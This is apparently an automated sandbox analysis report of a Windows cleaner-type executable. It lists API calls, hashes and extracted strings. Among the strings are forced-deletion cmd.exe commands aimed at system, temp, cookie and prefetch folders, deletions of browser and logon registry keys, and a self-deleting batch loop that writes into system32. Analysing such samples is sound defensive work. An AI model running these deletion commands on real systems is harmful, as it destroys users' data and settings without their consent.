                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLibraryLoadLocalelstrcpy
                                                                                              • String ID: LOC
                                                                                              • API String ID: 864663389-519433814
                                                                                              • Opcode ID: e6f3c999939144e02464b0b0fc0e2b59b0546a768625dfb11b6e071e05ce9b10
                                                                                              • Instruction ID: ffcff24ee2f8decf076d347500f601e65b7776f307dd8f414f4772e04c55416e
                                                                                              • Opcode Fuzzy Hash: e6f3c999939144e02464b0b0fc0e2b59b0546a768625dfb11b6e071e05ce9b10
                                                                                              • Instruction Fuzzy Hash: 3F01A771500208ABDF14BB60EC09ADA37ACAB04365F408577FD19D6191E778DE4C8E9A
                                                                                              APIs
                                                                                              • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0042EA10
                                                                                              • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0042EA40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: AdaptersInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3177971545-0
                                                                                              • Opcode ID: 04afacd52e89466cf82da10b8b8be73c46f93b8a84a9b27f9a449f8cc33cebfb
                                                                                              • Instruction ID: 4f22e88a5df2136267b61b20a62ceb5ab55facc037de5985a683b6d03b984736
                                                                                              • Opcode Fuzzy Hash: 04afacd52e89466cf82da10b8b8be73c46f93b8a84a9b27f9a449f8cc33cebfb
                                                                                              • Instruction Fuzzy Hash: 05F0AFF1A00311EBE7149F15D805B17B7E8EB84705F00892EF889CB241E378DD48CB91
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 64f7b6f75cea90bdd9947e7a34994e041742a05b1ea9121d2e1a6fcceb2a18e3
                                                                                              • Instruction ID: 2afed94fbf52a9488442a8020d80419d6e69f24e400d4a6813f348e17fbd4380
                                                                                              • Opcode Fuzzy Hash: 64f7b6f75cea90bdd9947e7a34994e041742a05b1ea9121d2e1a6fcceb2a18e3
                                                                                              • Instruction Fuzzy Hash: 9AE17B70500215EBDB15DF15C885ABE77B9EF08316F10851AFC09AA293CB3DEE09DB69
                                                                                              APIs
                                                                                                • Part of subcall function 00404F00: _rand.LIBCMT ref: 00405041
                                                                                                • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                                                                              • SendMessageA.USER32(?,00000401,00000000,?), ref: 00405836
                                                                                              • SendMessageA.USER32(?,00000402,00000000,00000000), ref: 00405848
                                                                                              • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00405859
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit,00000000,00000000), ref: 00405888
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 0040589A
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.gid && exit,00000000,00000000), ref: 004058B6
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004058C8
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.log & exit,00000000,00000000), ref: 004058E4
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004058F6
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.chk & exit,00000000,00000000), ref: 00405912
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405924
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit,00000000,00000000), ref: 0040594D
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), ref: 00405959
                                                                                                • Part of subcall function 00405630: SHGetSpecialFolderPathA.SHELL32(00000000,00000008,00000008,00000000), ref: 00405650
                                                                                                • Part of subcall function 00405630: SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs), ref: 00405674
                                                                                              • SHDeleteValueA.SHLWAPI(80000001,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,DefaultUserName), ref: 00405971
                                                                                              • SHDeleteValueA.SHLWAPI(80000001,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,AltDefaultUserName), ref: 00405986
                                                                                              • SHDeleteValueA.SHLWAPI(80000002,Software\Microsoft\Windows\CurrentVersion\Winlogon,DefaultUserName), ref: 0040599B
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU), ref: 004059AB
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU), ref: 004059B7
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU), ref: 004059C3
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU), ref: 004059CF
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU), ref: 004059DB
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004059ED
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\prefetch\*.* & exit,00000000,00000000), ref: 00405A0D
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A1F
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\recycled\*.* & exit,00000000,00000000), ref: 00405A3F
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A51
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit,00000000,00000000), ref: 00405A71
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A91
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit,00000000,00000000), ref: 00405AB5
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\TypedURLs), ref: 00405AC8
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\IntelliForms), ref: 00405ADB
                                                                                              • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\RAS Autodial\Addresses), ref: 00405AE7
                                                                                              • SHEmptyRecycleBinA.SHELL32(00000000,00000000,00000007), ref: 00405AF6
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405B21
                                                                                              • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\$NtUninstal*.* & exit,00000000,00000000), ref: 00405B41
                                                                                              • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405B53
                                                                                                • Part of subcall function 00459905: ShowWindow.USER32(?,?,00455C74,00000000,0000E146,00000000,?,?,00402EB7), ref: 00459912
                                                                                                • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                                                                              Strings
                                                                                              • /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit, xrefs: 00405AA4
                                                                                              • /k del /f /s /q %systemdrive%\*.log & exit, xrefs: 004058D3
                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00405967, 0040597C
                                                                                              • Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU, xrefs: 004059D1
                                                                                              • /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit, xrefs: 00405877
                                                                                              • cmd.exe, xrefs: 0040587C, 004058AA, 004058D8, 00405906, 00405941, 00405A01, 00405A33, 00405A65, 00405AA9, 00405B35
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, xrefs: 0040594F
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Winlogon, xrefs: 00405991
                                                                                              • AltDefaultUserName, xrefs: 00405977
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU, xrefs: 004059C5
                                                                                              • Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU, xrefs: 004059AD
                                                                                              • /k del /f /s /q %windir%\$NtUninstal*.* & exit, xrefs: 00405B30
                                                                                              • Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU, xrefs: 004059B9
                                                                                              • Information, xrefs: 00405B64
                                                                                              • They have been cleaned successfully!, xrefs: 00405B69
                                                                                              • /k del /f /s /q %systemdrive%\recycled\*.* & exit, xrefs: 00405A2E
                                                                                              • /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit, xrefs: 00405A60
                                                                                              • /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit, xrefs: 0040593C
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU, xrefs: 004059A1
                                                                                              • /k del /f /s /q %systemdrive%\*.gid && exit, xrefs: 004058A5
                                                                                              • /k del /f /s /q %systemdrive%\*.chk & exit, xrefs: 00405901
                                                                                              • /k del /f /s /q %windir%\prefetch\*.* & exit, xrefs: 004059FC
                                                                                              • Software\Microsoft\RAS Autodial\Addresses, xrefs: 00405ADD
                                                                                              • DefaultUserName, xrefs: 00405962, 0040598C
                                                                                              • open, xrefs: 00405881, 004058AF, 004058DD, 0040590B, 00405946, 00405A06, 00405A38, 00405A6A, 00405AAE, 00405B3A
                                                                                              • Software\Microsoft\Internet Explorer\TypedURLs, xrefs: 00405ABE
                                                                                              • Software\Microsoft\Internet Explorer\IntelliForms, xrefs: 00405AD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DeleteSend$ExecuteShell$Value$EmptyFolderH_prologPathRecycleShowSpecialWindow_rand
                                                                                              • String ID: /k del /f /s /q %systemdrive%\*.chk & exit$/k del /f /s /q %systemdrive%\*.gid && exit$/k del /f /s /q %systemdrive%\*.log & exit$/k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit$/k del /f /s /q %systemdrive%\recycled\*.* & exit$/k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit$/k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit$/k del /f /s /q %windir%\$NtUninstal*.* & exit$/k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit$/k del /f /s /q %windir%\prefetch\*.* & exit$AltDefaultUserName$DefaultUserName$Information$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU$Software\Microsoft\Internet Explorer\IntelliForms$Software\Microsoft\Internet Explorer\TypedURLs$Software\Microsoft\RAS Autodial\Addresses$Software\Microsoft\Windows NT\CurrentVersion\Winlogon$Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU$Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU$Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU$Software\Microsoft\Windows\CurrentVersion\Winlogon$They have been cleaned successfully!$cmd.exe$open
                                                                                              • API String ID: 608165374-3242249910
                                                                                              • Opcode ID: 9470b7cd3b11127832bb47f481f4ac34d4b82c993a343baa40c5a6d1fb0da4f5
                                                                                              • Instruction ID: 7915b94816bc076585abd770ead6f12c8ee0623fdfc370f13a234b32de4c556b
                                                                                              • Opcode Fuzzy Hash: 9470b7cd3b11127832bb47f481f4ac34d4b82c993a343baa40c5a6d1fb0da4f5
                                                                                              • Instruction Fuzzy Hash: 4E914B703C0B00BAF6207B619C47F6B7294EB54F06F31492EB75A7A1C1E9F878458A5E
                                                                                              APIs
                                                                                              • __time64.LIBCMT ref: 00402EB9
                                                                                                • Part of subcall function 00446DDD: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00402EBE,00000000), ref: 00446DE6
                                                                                                • Part of subcall function 00446DDD: __aulldiv.LIBCMT ref: 00446E06
                                                                                                • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                                                                                • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                                                                                • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                                                                                • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                                                                              • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00402F6D
                                                                                                • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                                                                              • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00402F9D
                                                                                              • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402FAF
                                                                                              • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 4.0), ref: 00402FC4
                                                                                              • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 5.0), ref: 00402FD9
                                                                                              • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 6.0), ref: 00402FEE
                                                                                              • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 7.0), ref: 00403003
                                                                                              • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 8.0), ref: 00403018
                                                                                              • RegOpenKeyExA.KERNEL32 ref: 00403046
                                                                                              • RegQueryValueExA.KERNEL32(?,Version,00000000,?,?,?), ref: 004030E7
                                                                                              • RegCloseKey.KERNEL32(?,80000002,?,00000000,00020019,?,SOFTWARE\Microsoft\Internet Explorer), ref: 00403124
                                                                                              • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00403166
                                                                                              • SendMessageA.USER32(?,0000014E,00000001,00000000), ref: 00403193
                                                                                              • SendMessageA.USER32(?,0000014E,00000002,00000000), ref: 004031C0
                                                                                              • SendMessageA.USER32(?,0000014E,00000003,00000000), ref: 004031ED
                                                                                              • SendMessageA.USER32(?,0000014E,00000004,00000000), ref: 0040321A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$OpenTime$CallbackCloseDispatcherErrorFileH_prologItemLastQuerySystemUserValue__aulldiv__time64
                                                                                              • String ID: Internet Explorer 4.0$Internet Explorer 5.0$Internet Explorer 6.0$Internet Explorer 7.0$Internet Explorer 8.0$ProductId$SOFTWARE\Microsoft\Internet Explorer$SOFTWARE\Microsoft\Internet Explorer\Registration$Version$d
                                                                                              • API String ID: 3070450969-2079231466
                                                                                              • Opcode ID: 46547f3797a4cde3ff040432e23ae9be5653e7e1b86516a1e286e490f84f3ad3
                                                                                              • Instruction ID: 12bbc5be726f8242eba0e1541a654c64904454683ae404ff7ef7c215fd5e6504
                                                                                              • Opcode Fuzzy Hash: 46547f3797a4cde3ff040432e23ae9be5653e7e1b86516a1e286e490f84f3ad3
                                                                                              • Instruction Fuzzy Hash: 94D1C670204741AFE310DB28CC86F9BB7A8BF84724F108A1DF6599B2D1DB78D505CB9A
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0045F8CC
                                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0045F8D7
                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0045F908
                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0045F910
                                                                                              • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0045F91D
                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0045F937
                                                                                              • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0045F93D
                                                                                              • GetVersion.KERNEL32 ref: 0045F94B
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 0045F970
                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0045F996
                                                                                              • ConvertDefaultLocale.KERNEL32(?), ref: 0045F9E2
                                                                                              • ConvertDefaultLocale.KERNEL32(76F90A60), ref: 0045F9E8
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0045F9F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
                                                                                              • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                              • API String ID: 780041395-483790700
                                                                                              • Opcode ID: 47d7d82368e40fe238e9fa7ef71f2118e8ce315a6da71a88ea93bf2d1b1e8eff
                                                                                              • Instruction ID: 8cf04242b056ed2888822f3ee261883fc83cb0ac3b597c26b6eb5f4152f102d6
                                                                                              • Opcode Fuzzy Hash: 47d7d82368e40fe238e9fa7ef71f2118e8ce315a6da71a88ea93bf2d1b1e8eff
                                                                                              • Instruction Fuzzy Hash: 715186B1E40219AEDF109FE5DC89BBFBBB8EB44315F10003BE905E3251D67C99448BA5
                                                                                              APIs
                                                                                                • Part of subcall function 00455F5B: __EH_prolog.LIBCMT ref: 00455F60
                                                                                                • Part of subcall function 00455F5B: FindResourceA.KERNEL32(?,00000000,00000005), ref: 00455F98
                                                                                                • Part of subcall function 00455F5B: LoadResource.KERNEL32(?,00000000), ref: 00455FA0
                                                                                                • Part of subcall function 00455F5B: LockResource.KERNEL32(00000000), ref: 00455FB2
                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00439E9D
                                                                                              • CopyFileA.KERNEL32(?,?), ref: 00439EF1
                                                                                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0043A20D
                                                                                                • Part of subcall function 0045A8A7: __EH_prolog.LIBCMT ref: 0045A8AC
                                                                                              • DeleteFileA.KERNEL32(?), ref: 0043A26B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
                                                                                              • API ID: FileResource$H_prolog$CopyDeleteExecuteFindLoadLockModuleNameShell
                                                                                              • String ID: del $ exit$"$" goto loop$:loop$@echo off$There are %d times remain to try!$There are no times remain to try, you must sign to use it!$\system32\winbws.bat$\system32\winsys.ini$\system32\winsys.ini $\system32\winsys.ini "$copy $del "$if exist "$open$start " " "
                                                                                              • API String ID: 2304847132-3863200934
                                                                                              • Opcode ID: 423f7c3977916f47568863e1800cbfd69c56de55b5a196779e49ba8ee4df1684
                                                                                              • Instruction ID: fcd660b851029791eff8e37d441e36e2141ad544d5897bee44c52de96331267e
                                                                                              • Opcode Fuzzy Hash: 423f7c3977916f47568863e1800cbfd69c56de55b5a196779e49ba8ee4df1684
                                                                                              • Instruction Fuzzy Hash: 1CC17D750083819BC314EB66C856FDFBBE8AF95308F40491FF589521D2EBB89508CB6B
                                                                                              APIs
                                                                                              • _rand.LIBCMT ref: 00405041
                                                                                              • RegOpenKeyExA.KERNEL32 ref: 0040507B
                                                                                              • _strncpy.LIBCMT ref: 00405118
                                                                                              • RegSetValueExA.KERNEL32(?,ProductName,00000000,00000007,?,?), ref: 0040514A
                                                                                              • RegCloseKey.KERNEL32(?), ref: 00405155
                                                                                              • GetParent.USER32(?), ref: 0040515F
                                                                                                • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2617500343.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2612469712.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2645617174.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2651718200.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                                                                              Similarity
